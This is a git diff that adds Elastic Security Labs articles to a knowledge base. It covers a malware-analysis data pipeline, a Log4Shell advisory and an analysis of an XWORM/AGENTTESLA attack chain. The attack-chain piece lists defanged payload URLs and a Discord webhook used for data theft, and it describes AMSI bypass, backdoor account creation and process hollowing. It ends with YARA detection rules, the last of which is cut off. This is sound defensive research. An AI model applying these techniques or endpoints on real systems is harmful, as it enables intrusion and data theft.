+ +![The newly created enrich-* system index](/assets/images/an-elastic-approach-to-large-scale-dynamic-malware-analysis/image16.jpg) + +We now have a list of known benign fingerprints, which we will use within our enrich pipeline to filter our mixed dataset with. Our enrich pipeline will once again use a condition to differentiate between data sources. An overview of our enrich processors is displayed below. + +![Enrich ingest pipeline](/assets/images/an-elastic-approach-to-large-scale-dynamic-malware-analysis/image8.jpg) + +Focusing on the auditd manager, we built an enrich processor using the condition field to check if the document's dataset is auditd_manager.auditd. If it matches, we reference the enrich policy we created for that dataset. Using the fingerprint field, we match and enrich incoming documents. If the fingerprint is known within the enrich indices we created, we add the "enrich_label" field with the fingerprint to the document. See the processor below. + +![Configuration example](/assets/images/an-elastic-approach-to-large-scale-dynamic-malware-analysis/image7.png) + +Once a document originating from the auditd_manager.auditd dataset comes through, the enrich processor is executed, and this finally executes a [script processor](https://www.elastic.co/guide/en/elasticsearch/reference/current/script-processor.html). The script processor allows us to run inline or stored scripts on incoming documents. We leverage this functionality to read each document in the pipeline, check whether the “enrich_label” field was added; and if this is the case, we set a new boolean field called “known_benign” to true and remove the “enrich_label” and “enriched_fingerprint” fields. If the document does not contain the “enrich_label” field, we set “known\_benign” to false. This allows us to easily filter our mixed dataset in Kibana. + +![Script processor](/assets/images/an-elastic-approach-to-large-scale-dynamic-malware-analysis/image3.jpg) + +When using the “test pipeline” feature by adding a document that contains the “enrich_label”, we can see that the “fingerprint” and the “known_benign” fields are set. + +![Testing the pipeline with a benign document](/assets/images/an-elastic-approach-to-large-scale-dynamic-malware-analysis/image22.jpg) + +For documents that do not contain “enrich\_label”, just the fingerprint is set. + +Working with these enrich policies requires some setup, but once they are well structured they can truly filter out a lot of noise. Because doing this manually is a lot of work, we created some simple Python scripts to somewhat automate this process. We will go into more detail about how to automate the creation of these enrich policies, their execution, the creation of the enrich pipeline and more shortly. + +#### Ingest pipeline chaining + +The [pipeline ingest pipeline](https://www.elastic.co/guide/en/elasticsearch/reference/current/pipeline-processor.html) provides a way to chain multiple ingest pipelines. By chaining pipelines, we create a sequence of operations that collectively shapes the incoming data in the form that we want, facilitating our needs for data normalization, fingerprint calculation, and data enrichment. + +In our work with Detonate, we ended up creating two ingest pipelines. The first will process benign data, which consists of a normalization pipeline and a fingerprint calculation pipeline. The next will process malicious data, consisting of a normalization, fingerprint calculation, and enrichment pipeline. 
An example of this would be the following: + +![Pipeline ingest pipeline](/assets/images/an-elastic-approach-to-large-scale-dynamic-malware-analysis/image15.jpg) + +With the pipelines in place, we need to ensure that they are actually being used when ingesting data. To accomplish this, we leverage component templates. + +### Component templates + +[Component templates](https://www.elastic.co/guide/en/elasticsearch/reference/current/indices-component-template.html) are reusable configurations that define the settings and mappings for specific types of Elasticsearch components. They provide a convenient way to define and manage consistent configurations across multiple components, simplifying the management and maintenance of resources. + +When you first start using any fleet integrations, you would notice that a lot of component templates are created by default. These are also tagged as "managed", meaning that you can't change the configuration. + +![Component template overview](/assets/images/an-elastic-approach-to-large-scale-dynamic-malware-analysis/image24.png) + +In order to accommodate users that want to post process events that are ingested via the fleet managed agent, all index templates call out to a final component template whose name ends in `@custom`. + +![Custom component template overview](/assets/images/an-elastic-approach-to-large-scale-dynamic-malware-analysis/image9.png) + +The settings you put in these components will never be changed by updates. In our use case, we use these templates to add a mapping for the enrichment fields. Most of the data that is ingested via the fleet and its integrations will go through an ingest pipeline. These pipelines will follow the same pattern in order to accommodate user customizations. Take for example the following ingest pipeline: + +![Example of fleet manager component template](/assets/images/an-elastic-approach-to-large-scale-dynamic-malware-analysis/image23.jpg) + +We can see that it is managed by fleet and it is tied to a specific version (e.g. 8.8.0) of the integration. The processor will end by calling the `@custom` pipeline, and ignore it if it doesn't exist. + +We want to add our enrichment data to the documents using the enrichment pipelines we described in the previous section. This can now simply be done by creating the `@custom` pipeline and having that call out to the enrichment pipeline. + +![Example of the created custom ingest pipeline](/assets/images/an-elastic-approach-to-large-scale-dynamic-malware-analysis/image5.jpg) + +### Automating the process + +In order to create the gsub processors, ingest pipelines, and enrich policies, we had to use three Python scripts. In the next section we will showcase these scripts. If you choose to integrate these scripts, remember that you will need to adjust them to match your own environment in order to make them work. + +#### Creating the gsub ingest pipelines + +In order to create a gsub pipeline that will replace the given random paths by static ones we used a Python [script](https://github.com/elastic/labs-releases/blob/main/tools/malware_research/gsub_pipeline_json_object.py) that takes several fields and patterns as an input, and prints out a json object which can be used by the pipeline creation API. 
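+To illustrate the shape of the result (the pipeline name, field, and regex below are placeholder assumptions, not the script's actual output), registering such a gsub-based normalization pipeline through the pipeline creation API could look like this:
+
+```
+# Illustrative sketch of registering a gsub-based normalization pipeline
+# (the pipeline name, field, and regex below are placeholders).
+from elasticsearch import Elasticsearch
+
+es = Elasticsearch("https://localhost:9200", api_key="<api-key>")
+
+es.ingest.put_pipeline(
+    id="normalize_events",
+    description="Replace random path components so fingerprints stay comparable",
+    processors=[
+        {
+            "gsub": {
+                "field": "process.executable",
+                # Collapse the random 6-character Elastic Agent data directory.
+                "pattern": "/opt/Elastic/Agent/data/elastic-agent-[a-z0-9]{6}/",
+                "replacement": "/opt/Elastic/Agent/data/elastic-agent-XXXXXX/",
+                "ignore_missing": True,
+            }
+        }
+    ],
+)
+```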
+ +#### Create Custom Pipelines + +After setting up the gsub pipeline, we leveraged [a second Python script](https://github.com/elastic/labs-releases/blob/main/tools/malware_research/custom_pipelines.py) that searches for all Fleet-managed configurations that call an @custom ingest pipeline. It then creates the appropriate pipeline, after which all the custom pipelines point to the `process_local_events` pipeline. + +#### Generate Enrichment Processors + +Finally, we created a [third](https://github.com/elastic/labs-releases/blob/main/tools/malware_research/enrich_policy_setup.py) Python script that handles the creation of enrichment processors in four steps. + +1. `The cleanup process` : While an enrichment processor is used in an ingest pipeline, it cannot be deleted. During testing and development we simply delete and recreate the ingest pipeline. This is of course not recommended for production environments. +2. `Create enrich policies` : The script will create every individual policy. +3. `Execute the policies` : This will start the process of creating the hidden enrichment system index. Note that the execution of the policy will take longer than the execution of the script, as the script does not wait for the command to complete. Elastic will create the enrichment index in the background. +4. `Re-create the ingest pipeline` : After the enrich policy has been updated, we can re-create the ingest pipeline that uses the enrichments. + +After executing these three scripts, the whole setup is completed, and malicious data can be ingested into the correct namespace. + +### Results and limitations + +Our benign dataset includes 53,267,892 documents generated by executing trusted binaries on a variety of operating systems and collecting events from high-value data sources. Using this normalized benign dataset, we calculated the fingerprints and created the enrich policies per data type. + +With this setup in place, we detonated 332 samples. After removing the Elastic agent metrics and endpoint alerts from the datasets, we ended up with a mixed dataset containing a total of 41,710,279 documents. + +![Results prior to filtering on known_benign = false](/assets/images/an-elastic-approach-to-large-scale-dynamic-malware-analysis/image17.jpg) + +After filtering on “known_benign” = false, we end up with 1,321,949 documents. This is a decrease of 96.83% in document count. + +![Results after filtering on known_benign = false](/assets/images/an-elastic-approach-to-large-scale-dynamic-malware-analysis/image4.png) + +The table below presents an overview of each data source and its corresponding number of documents before and after filtering on our “known_benign” field. + +![Results of filtering out benign data](/assets/images/an-elastic-approach-to-large-scale-dynamic-malware-analysis/Screenshot_2023-07-27_at_11.08.25_AM.jpg) + +We can see that we managed to successfully filter most data sources by a decent percentage. Additionally, the numbers presented in the “after” column include malicious data that we do want to capture. For example, among the different malware samples, several included ransomware - which tends to create a lot of file events. Also, all of the HTTP traffic originated from malware samples trying to connect to their C2s. The auditd\_manager and fim.event datasets include a lot of the syscalls and file changes performed by the samples. + +While building out this pipeline, several lessons were learned. 
First of all, as mentioned before, if you add one wrong field to the fingerprint calculation, the whole dataset might end up generating lots of noise. This can be seen by adding the source.port to the packetbeat fingerprint calculation, which causes the endpoint.events.network and all network\_traffic-\* datasets to increase drastically. + +The second lesson we learned is that it is not only important to have a representative dataset, but also to have a large one. These two go hand in hand: having a small dataset, or a dataset whose behavior does not closely resemble the data that will be ingested later, makes the pipelines less than half as effective. + +Finally, some data sources are better suited for this filtering approach than others. For example, when dealing with `system.syslog` and `system.auth` events, most of the fields within the document (except the message field) are always the same. Because we cannot use this approach for unstructured data, such as plain text fields, a filter that only looks at the remaining fields would filter out 99% of the events. + +### Visualizing results + +Kibana offers many great options to visualize large datasets. We chose to leverage the Lens functionality within Kibana to search through our malicious dataset. By filtering on `known_benign` = false, setting `count of fingerprint` as a metric, and sorting in ascending order, we can right away see different malware samples executing different tasks. Examples of file events are shown below. + +![Using Lens to visualize malicious file events](/assets/images/an-elastic-approach-to-large-scale-dynamic-malware-analysis/image2.png) + +Within this table, we can see: + +- Suspicious files being created in the `/dev/shm/` directory +- “ `HOW_TO_DECRYPT.txt` ” file creations indicating the creation of a ransom message +- Files being changed to contain new random file extensions, indicating the ransomware encryption process + +When looking into file integrity monitoring events, we can also very easily distinguish benign events from malicious events by applying the same filter. + +![Using Lens to visualize malicious symlink events](/assets/images/an-elastic-approach-to-large-scale-dynamic-malware-analysis/image10.jpg) + +Right away we notice the creation of a symlink for a `linux.service` and `bot.service`, and several run control symlinks to establish persistence on the system. + +Looking at network connections, we can see `connection_attempted` events from malicious samples to potential C2 servers on several uncommon ports. + +![Using Lens to visualize malicious network connections](/assets/images/an-elastic-approach-to-large-scale-dynamic-malware-analysis/image19.jpg) + +Finally, looking at auditd manager syscall events, we can see the malware opening files such as `cmdline` and `maps` and attempting to change the permissions of several files. + +![Using Lens to visualize malicious syscalls](/assets/images/an-elastic-approach-to-large-scale-dynamic-malware-analysis/image11.png) + +Overall, in our opinion, the data cleaning results are very promising and allow us to more efficiently conduct dynamic malware analysis on a large scale. The process can always be further optimized, so feel free to take advantage of our approach and fine-tune it to your specific needs. + +## Beyond Dynamic Malware Analysis + +In the previous sections we described our exact use case for leveraging fingerprint and enrich ingest pipelines. 
Other than malware analysis, there are many other fields that can reap the benefits of a workflow similar to the one outlined above. Several of these applications and use cases are described below: + +- Forensics and Security: Fingerprinting can be employed in digital forensics and security investigations to identify and link related artifacts or events. It helps in tracing the origin of data, analyzing patterns, and identifying potential threats or anomalies in log files, network traffic, or system events. Researchers over at Microsoft leveraged fuzzy hashing in [previous research](https://techcommunity.microsoft.com/t5/microsoft-security-experts-blog/fuzzy-hashing-logs-to-find-malicious-activity/ba-p/3786669) to detect malicious web shell traffic. +- Identity Resolution: Fingerprinting can be used to uniquely identify individuals or entities across different data sources. This is useful in applications like fraud detection, customer relationship management, and data integration, where matching and merging records based on unique identifiers is crucial. +- Data Deduplication: Fingerprinting can help identify and eliminate duplicate records or documents within a dataset. By comparing fingerprints, you can efficiently detect and remove duplicate entries, ensuring data integrity and improving storage efficiency. Readers interested in data deduplication use cases might find great value in pre-built tools such as [Logslash](https://blog.foxio.io/introducing-logslash-and-the-end-of-traditional-logging-2c6708b6fc1c) to achieve this goal. +- Content Management: Fingerprinting can be used in content management systems to detect duplicate or similar documents, images, or media files. It aids in content deduplication, similarity matching, and content-based searching by improving search accuracy and enhancing the overall user experience. +- Media Identification: Fingerprinting techniques are widely used in media identification and recognition systems. By generating unique fingerprints for audio or video content, it becomes possible to identify copyrighted material, detect plagiarism, or enable content recommendation systems based on media similarity. + +## Conclusion + +There are many different approaches to dynamic malware analysis. This blog post explored some of these options by leveraging the powerful capabilities offered by Elastic. Our aim was both to present a new method of dynamic malware analysis and to broaden your understanding and knowledge of the built-in functionalities within Elastic. + +Elastic Security Labs is the threat intelligence branch of Elastic Security dedicated to creating positive change in the threat landscape. Elastic Security Labs provides publicly available research on emerging threats with an analysis of strategic, operational, and tactical adversary objectives, then integrates that research with the built-in detection and response capabilities of Elastic Security. + +Follow Elastic Security Labs on Twitter @elasticseclabs and check out our research at [www.elastic.co/security-labs/](http://www.elastic.co/security-labs/). 
+ diff --git a/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/analysis_of_log4shell_cve_2021_45046.md b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/analysis_of_log4shell_cve_2021_45046.md new file mode 100644 index 0000000000000..d9d8a93aa9720 --- /dev/null +++ b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/analysis_of_log4shell_cve_2021_45046.md @@ -0,0 +1,66 @@ +--- +title: "Analysis of Log4Shell vulnerability & CVE-2021-45046" +slug: "analysis-of-log4shell-cve-2021-45046" +date: "2022-11-30" +description: "In this post, we cover next steps the Elastic Security team is taking for users to continue to protect themselves against CVE-2021-44228, or Log4Shell." +author: + - slug: jake-king +image: "photo-edited-12-e.jpg" +category: + - slug: security-research + - slug: vulnerability-updates +--- + +> _To understand how Elastic is currently assessing internal risk of this vulnerability in our products please see the advisory_[_here._](https://discuss.elastic.co/t/apache-log4j2-remote-code-execution-rce-vulnerability-cve-2021-44228-esa-2021-31/291476) +> +> _This document was updated on December 17, 2021 to reflect a revised CVSS score for CVE-2021-45046, and new findings by the community._ + +In recent days Log4Shell, or CVE-2021-44228, has dominated the news cycle in the world of information security and beyond. Elastic released an [advisory](https://discuss.elastic.co/t/apache-log4j2-remote-code-execution-rce-vulnerability-cve-2021-44228-esa-2021-31/291476?ultron=log4js-exploit&blade=announcement&hulk=email&mkt_tok=ODEzLU1BTS0zOTIAAAGBU8N1ZUOwzTcRbJCOiByHmeYiopMnarq-QPWBIyhPI3Vvsp6w-4q4PBbTGZ3fZ0sB75cpaUdOddA1k-6-yh3QwAicvJTgafdJWv_-9Cn2GoKLvsmt) detailing how Elastic products and users are impacted, and a [blog](https://www.elastic.co/blog/detecting-log4j2-with-elastic-security?ultron=log4js-exploit&blade=announcement&hulk=email&mkt_tok=ODEzLU1BTS0zOTIAAAGBU8N1ZDYRbFq2QZ4ZK8tc2IbDatArsdI6WGcA2M90g4v02svJeqCXFeZ23R4TjeYii4KBGAkqMBgWc5IkxYrmefgwZBanjGQh8v66drUymiVSQFvs) post describing how our users can leverage Elastic Security to help defend their networks. + +Many readers have further questions as to how we’re tracking this issue within Elastic Security, what our coverage is now, and what we’re expecting to do next. This post outlines a few details for our current status, and provides details regarding a new, related vulnerability: CVE-2021-45046. + +## Elastic Security response + +As you may imagine, the team has worked tirelessly to ensure that we’re developing detections for both active exploitation of the vulnerability, as well as post-compromise indicators, and will continue active development until further notice. + +We’re spending time focusing on detailed detections that better align with some of the emerging trends that adversaries are now taking advantage of as they have time to develop their attack strategies. And we’re not working in silence — those that may have had a chance to catch up on our [original post](https://www.elastic.co/blog/detecting-log4j2-with-elastic-security) a few days ago will be pleasantly surprised we’ve added further detections and hunting examples, and will continue to do so as we learn more with the community. 
+ +Alongside the threat research and signature development, we’ve noted some interesting observations: + +- We noted several instances of [generic crypto miners](https://www.virustotal.com/gui/file/5b25db204b5cd5cc3193f4378dd270dced80da9d39874d8b6fdd75e97d2cc907/detection) for Linux being deployed that appeared to be related to exploitation of this CVE, but determined that they are benign true positives +- We’ve stopped at least eight different families of malware being deployed using the log4j exploit, indicating widespread adoption of the exploit by threats of all kinds +- While we are observing coverage across our full protection suite (such as behavior protection), it is noteworthy that our free basic-tier malware protection is successfully preventing initial access + +We will aim to keep users and readers apprised of findings, and hope to share additional observations in the wild as we see them. + +## A new contender: CVE-2021-45046 + +While we watch the CVE-2021-44228 (Log4Shell) vulnerability dominate the news cycles, a new contender, [CVE-2021-45046](https://nvd.nist.gov/vuln/detail/CVE-2021-45046), was accidentally introduced in Log4j2 version 2.15.0, allowing adversaries to invoke a Denial of Service or remote code execution condition through specially crafted payloads. Previous mitigations to avoid Information Disclosure vulnerabilities by setting the `log4j2.noFormatMsgLookup` state to `true` do not mitigate against this new finding, according to the CVE details. + +While CVE-2021-45046 initially carried a lower CVSS score of 3.7 due to the impact of the initially discovered condition that can be invoked, it was re-evaluated to a 9.0, indicating that limited remote code execution was possible. The finding was shared on December 16, 2021 by [Alvaro Muñoz](https://twitter.com/pwntester/status/1471465662975561734), who identified that while the default setting formatMsgNoLookups was accurately set to true, there were alternative locations for lookups to take place. Technical details are still unfolding from the community; however, the Log4j2 team shared the following message within their security updates: + +_The reason these measures are insufficient is that, in addition to the Thread Context attack vector mentioned above, there are still code paths in Log4j where message lookups could occur: known examples are applications that use Logger.printf("%s", userInput), or applications that use a custom message factory, where the resulting messages do not implement StringBuilderFormattable. There may be other attack vectors._ + +_The safest thing to do is to upgrade Log4j to a safe version, or remove the JndiLookup class from the log4j-core jar._ [_Reference here_](https://logging.apache.org/log4j/2.x/security.html) + +Given this new information, and readily available [POCs](https://twitter.com/marcioalm/status/1471740771581652995) for exploitation, the Apache team has recommended that those impacted upgrade to the latest, safe version of Log4j2, or alternatively remove the JndiLookup class from the log4j-core jar. 
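+
+As a quick illustration of the second mitigation, the sketch below (our own illustrative helper, not an Apache or Elastic tool) checks whether a given JAR still contains the `JndiLookup` class at its documented path; note that a shaded or relocated copy of Log4j would not be caught by this simple check:
+
+``` python
+import sys
+import zipfile
+
+# Documented location of the vulnerable class inside log4j-core JARs.
+JNDI_LOOKUP = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
+
+def jar_contains_jndilookup(jar_path):
+    """Return True if the JAR still ships the JndiLookup class."""
+    with zipfile.ZipFile(jar_path) as jar:
+        return JNDI_LOOKUP in jar.namelist()
+
+if __name__ == "__main__":
+    for path in sys.argv[1:]:
+        if jar_contains_jndilookup(path):
+            print(f"{path}: JndiLookup class present - upgrade Log4j2 or remove the class")
+        else:
+            print(f"{path}: JndiLookup class not found")
+```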
+ +Elastic Security has observed many threat actors and benign scanners leveraging this new methodology already in some edge environments, with payloads incorporating previous attack methodologies such as key extraction attempts and base64 encoded payloads: + +![A preview of the rapid acceleration of scanning attempts adopting this new vulnerability](/assets/images/analysis-of-log4shell-cve-2021-45046/scanning-attempts-vulnerability.jpg) + +We anticipate adding further details as we learn them, and thank the team at lunasec specifically for providing a [detailed, early summary](https://www.lunasec.io/docs/blog/log4j-zero-day-severity-of-cve-2021-45046-increased/) of this emerging situation, and of course, provide kudos to [Alvaro Muñoz](https://twitter.com/pwntester) of Github Security Lab for the findings. + +## Thank you (again!), from Elastic Security + +We want to thank all of the security teams across the globe for your tireless work this week. As we referenced before, openness and collaboration in the security community to safeguard all users is paramount when facing such a serious and pervasive vulnerability. + +Existing Elastic Security users can access these capabilities within the product. If you’re new to Elastic Security, take a look at our [Quick Start guides](https://www.elastic.co/training/elastic-security-quick-start) (bite-sized training videos to get you started quickly) or our [free fundamentals training courses](https://www.elastic.co/training/free#fundamentals). + +Get started with a [free 14-day trial of Elastic Cloud](https://cloud.elastic.co/registration). Or [download](https://www.elastic.co/downloads/) the self-managed version of the Elastic Stack for free. + +### References + +[https://logging.apache.org/log4j/2.x/security.html](https://logging.apache.org/log4j/2.x/security.html) + +[https://www.lunasec.io/docs/blog/log4j-zero-day-severity-of-cve-2021-45046-increased/](https://www.lunasec.io/docs/blog/log4j-zero-day-severity-of-cve-2021-45046-increased/) diff --git a/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/attack_chain_leads_to_xworm_and_agenttesla.md b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/attack_chain_leads_to_xworm_and_agenttesla.md new file mode 100644 index 0000000000000..920df028a2376 --- /dev/null +++ b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/attack_chain_leads_to_xworm_and_agenttesla.md @@ -0,0 +1,224 @@ +--- +title: "Attack chain leads to XWORM and AGENTTESLA" +slug: "attack-chain-leads-to-xworm-and-agenttesla" +date: "2023-04-10" +description: "Our team has recently observed a new malware campaign that employs a well-developed process with multiple stages. The campaign is designed to trick unsuspecting users into clicking on the documents, which appear to be legitimate." +author: + - slug: salim-bitam +image: "blog-thumb-coin-stacks.jpg" +category: + - slug: attack-pattern + - slug: malware-analysis +tags: + - xworm + - agenttesla +--- + +## Key Takeaways + +- Threat actors are deploying known malware using their own custom .NET loaders +- The threat actors employ simple and well-known tactics such as bypassing AMSI through patching and a basic custom .NET loader +- The threat actors are abusing legitimate free file hosting services + +## Preamble + +Our team has recently observed a new malware campaign that employs a well-developed process with multiple stages. 
The campaign is designed to trick unsuspecting users into clicking on the documents, which appear to be legitimate but are in fact fake. The adversary leverages weaponized Word documents to execute malicious PowerShell scripts, and also utilizes a custom obfuscated .NET loader to load various malware strains, including XWORM and AGENTTESLA. + +## RTF loader code analysis + +### Overview + +During a recent investigation, we discovered a malicious Word document named `Card & Booking Details.docx`. This document has been designed with the intent to deceive the victim and includes two falsified scanned documents, namely a credit card and a passport. + +Upon opening the document, an RTF object hosted at `www.mediafire[.]com/file/79jzbqigitjp2v2/p2.rtf` is fetched. + +This RTF object contains a macro-enabled Excel object. When opened, this macro downloads an obfuscated PowerShell script which in turn deploys different malware families. + +At the time of this writing, we have observed two distinct malware families, namely XWORM and AGENTTESLA, deployed through this execution chain. Both malware families mentioned above are loaded into the compromised system's memory by the same custom .NET loader. Once loaded, the malicious payload can carry out a range of functions, such as stealing sensitive data and executing commands on the compromised system. + +![Execution flow diagram](/assets/images/attack-chain-leads-to-xworm-and-agenttesla/image8.png) + +In this research post, we will walk through the initial execution of the malware and detail the capabilities we discovered. + +### Extracting the malicious VBA + +The RTF document contains multiple embedded objects, including an interesting one that caught our attention: `Excel.SheetMacroEnabled`. + +![Listing objects embedded in the RTF document](/assets/images/attack-chain-leads-to-xworm-and-agenttesla/image1.jpg) + +We can use [`rtfdump.py`](https://github.com/DidierStevens/DidierStevensSuite/blob/master/rtfdump.py), a script developed by Didier Stevens to analyze RTF files, to dump the object and [`olevba.py`](https://www.decalage.info/python/olevba), a script developed by Philippe Lagadec, to extract any embedded VBA scripts from an [OLE](https://en.wikipedia.org/wiki/Object_Linking_and_Embedding) object. The extracted VBA script shown below downloads and executes a malicious PowerShell script from `https://www.mediafire[.]com/file/xnqxmqlcj51501d/7000m.txt/file`. + +![Extracting the VBA script from the Excel sheet object](/assets/images/attack-chain-leads-to-xworm-and-agenttesla/image2.png) + +### PowerShell script analysis + +The malicious PowerShell script is obfuscated using string substitution to evade detection and make analysis more difficult. + +![Powershell script obfuscated using string substitution](/assets/images/attack-chain-leads-to-xworm-and-agenttesla/image13.png) + +It contains additional PowerShell script blocks in hex format that will be deployed on the infected machine, designed to prepare the environment by setting up persistence, bypassing AMSI, disabling Windows Defender, and creating a mechanism to update the malware. The ultimate objective is to install two .NET binaries, namely a loader and a payload (XWORM / AGENTTESLA). + +### Deleting the malicious document + +The malware starts by deleting the original Word document, first killing the process `Winword.exe` and then deleting all .DOCX files located in the default `Downloads` and `Desktop` folders of every user. 
This initial step shows the malware's destructive nature and how it can potentially harm the user's data. + +![Powershell command to delete the malicious word document](/assets/images/attack-chain-leads-to-xworm-and-agenttesla/image5.jpg) + +### Persistence + +The malware creates a directory in the path `C:\ProgramData\MinMinons`, which is used to store other PowerShell scripts and binaries. The currently running PowerShell script is then copied to `C:\ProgramData\MinMinons\Candlegraphy.___`. + +Next, the malware deobfuscates the first embedded PowerShell script, which is used to create persistence. It first writes a JScript file that invokes the original PowerShell script saved in `C:\ProgramData\MinMinons\Candlegraphy.___` through the ActiveXObject shell; then a scheduled task named “MOperaChrome” is created to run the JScript file using the Microsoft-signed [Windows Script Host (WSH) utility](https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/wscript), `wscript.exe`. + +![Persistence through task scheduling](/assets/images/attack-chain-leads-to-xworm-and-agenttesla/image10.jpg) + +### AMSI bypass + +The second embedded PowerShell script is responsible for bypassing AMSI by patching the `amsiInitFailed` flag. In doing so, the initialization of AMSI fails, preventing any scan from being initiated for the ongoing process. Furthermore, the PowerShell script proceeds to disable the Microsoft Windows Defender service. + +![Disabling WinDefend service](/assets/images/attack-chain-leads-to-xworm-and-agenttesla/image5.jpg) + +### User creation + +The script creates a local administrator account named “System32” and adds it to the Remote Desktop Users group. This enables the attacker to log in via Remote Desktop Protocol (RDP). Next, the script disables the machine's firewall to allow inbound RDP connection attempts which aren’t filtered by edge controls. + +![Creating a backdoor user](/assets/images/attack-chain-leads-to-xworm-and-agenttesla/image9.jpg) + +### Malware update persistence + +The third embedded script stores a secondary JScript file, whose purpose is downloading a revised or updated version of the malware. This file is saved to a predetermined location at `C:\ProgramData\MinMinons\miguan.js`. Furthermore, a scheduled task named “miguaned” is created to execute the JScript file through `wscript.exe`, similar to the previously described task. + +The JScript creates an instance of the `WScript.Shell` object by calling ActiveXObject with the CLSID `{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}`, which corresponds to the Shell Object, then downloads the updated PowerShell malware from the URL `https://billielishhui.blogspot[.]com/atom.xml`. + +![JScript script used for updating the malware](/assets/images/attack-chain-leads-to-xworm-and-agenttesla/image4.jpg) + +### .NET loader + +The custom .NET loader employs the [P/INVOKE technique](https://learn.microsoft.com/en-us/dotnet/standard/native-interop/pinvoke) to call the native Windows API and inject a payload into a signed Microsoft binary via [process hollowing](https://attack.mitre.org/techniques/T1055/012/). + +The loader’s code employs various obfuscation techniques to hinder analysis, including the use of dead instructions, renamed symbols that make the code less readable, and encoded strings. Fortunately, a tool like [de4dot](https://github.com/de4dot/de4dot) can be used to output a human-readable version of it. 
+ +![.NET loader code obfuscation](/assets/images/attack-chain-leads-to-xworm-and-agenttesla/image12.jpg) + +The malware leverages the `LoadLibrary` and `GetProcAddress` APIs to access the required Windows APIs. To obscure the names of these APIs, the loader stores them in an encoded format within the binary file, utilizing a sequence of substitution and string reversal methods. + +![.NET loader string obfuscation](/assets/images/attack-chain-leads-to-xworm-and-agenttesla/image3.jpg) + +The loader then starts a process in a suspended state using the `CreateProcessA` API. The following is the list of executables it uses as a host for its malicious code: + +- `C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe` +- `C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe` +- `C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe` + +These binaries are signed and trusted by the system and can evade detection by security software that relies on whitelisting system processes. The loader then uses `ZwUnmapViewOfSection` to unmap the memory of the target process, writes the payload to the suspended process, and then resumes the thread using the `ResumeThread` API. + +### Final payload + +During our research we discovered that the threat actor has been deploying different payloads. Namely, we observed two families: XWORM and AGENTTESLA. + +XWORM has gained notoriety in the underground criminal marketplace due to its ability to employ sophisticated capabilities like virtualization and sandbox detection, used to avoid detection and support persistence within an infected system. + +Of particular concern is the fact that XWORM is readily available on the internet as a cracked version, with version 2.1 being especially prevalent. This highlights the dangers of underground cybercrime markets and the ease with which malicious actors can access and utilize powerful tools. + +Two different versions of the XWORM family were observed: versions 2.2 and 3.1. The following is the configuration of an XWORM sample in plain text. + +![XWorm configuration](/assets/images/attack-chain-leads-to-xworm-and-agenttesla/image14.jpg) + +AGENTTESLA is a trojan and credential stealer written in .NET. While it first emerged in 2014, it is now among the most active malicious software. AGENTTESLA is affordably priced and includes support from the developers, making it easily accessible to cybercriminals with limited technical skills. + +The sample we analyzed is heavily obfuscated, masquerades as an AVG installer, and leverages Discord for C2. It uploads stolen information to the attacker’s Discord channel via the following webhook: `https://discord[.]com/api/webhooks/1089956337733087274/uYNA_D8Ns1z9NZ3B1mGp0XXyGq-785KLGIfEAZsrz3TJd5fvOjXA927F7bUTTzbNT6Zk`. 
+ +- [Initial access](https://attack.mitre.org/tactics/TA0001) +- [Execution](https://attack.mitre.org/tactics/TA0002) +- [Persistence](https://attack.mitre.org/tactics/TA0003) +- [Command and control](https://attack.mitre.org/tactics/TA0011) +- [Defense evasion](https://attack.mitre.org/tactics/TA0005) + +## Techniques/subtechniques + +Techniques and Subtechniques represent how an adversary achieves a tactical goal by performing an action. + +- [Process injection](https://attack.mitre.org/techniques/T1055/) +- [Indicator removal: File deletion](https://attack.mitre.org/techniques/T1070/004/) +- [Scheduled task/job: Scheduled task](https://attack.mitre.org/techniques/T1053/005/) +- [User Execution: Malicious File](https://attack.mitre.org/techniques/T1204/002/) +- [Phishing: Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001/) +- [Command and Scripting Interpreter: Powershell](https://attack.mitre.org/techniques/T1059/003/) +- [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027/) +- [Impair Defenses: Disable or Modify Tools](https://attack.mitre.org/techniques/T1629/003/) +- [Create Account](https://attack.mitre.org/techniques/T1136/) + +## Detection logic + +### YARA + +Elastic Security has created YARA rules to identify this activity. Below are YARA rules to identify XWORM and [AGENTTESLA](https://github.com/elastic/protections-artifacts/blob/main/yara/rules/Windows_Trojan_AgentTesla.yar) malware families. + +``` +rule Windows_Trojan_Xworm_732e6c12 { +meta: + author = "Elastic Security" + id = "732e6c12-9ee0-4d04-a6e4-9eef874e2716" + fingerprint = "afbef8e590105e16bbd87bd726f4a3391cd6a4489f7a4255ba78a3af761ad2f0" + creation_date = "2023-04-03" + last_modified = "2023-04-03" + os = "Windows" + arch = "x86" + category_type = "Trojan" + family = "Xworm" + threat_name = "Windows.Trojan.Xworm" + source = "Manual" + maturity = "Diagnostic" + reference_sample = "bf5ea8d5fd573abb86de0f27e64df194e7f9efbaadd5063dee8ff9c5c3baeaa2" + scan_type = "File, Memory" + severity = 100 + +strings: + $str1 = "startsp" ascii wide fullword + $str2 = "injRun" ascii wide fullword + $str3 = "getinfo" ascii wide fullword + $str4 = "Xinfo" ascii wide fullword + $str5 = "openhide" ascii wide fullword + $str6 = "WScript.Shell" ascii wide fullword + $str7 = "hidefolderfile" ascii wide fullword +condition: + all of them} + +rule Windows_Trojan_AgentTesla_d3ac2b2f { +meta: + author = "Elastic Security" + id = "d3ac2b2f-14fc-4851-8a57-41032e386aeb" + fingerprint = "cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc" + creation_date = "2021-03-22" + last_modified = "2022-06-20" + os = "Windows" + arch = "x86" + category_type = "Trojan" + family = "AgentTesla" + threat_name = "Windows.Trojan.AgentTesla" + source = "Manual" + maturity = "Diagnostic, Production" + reference_sample = 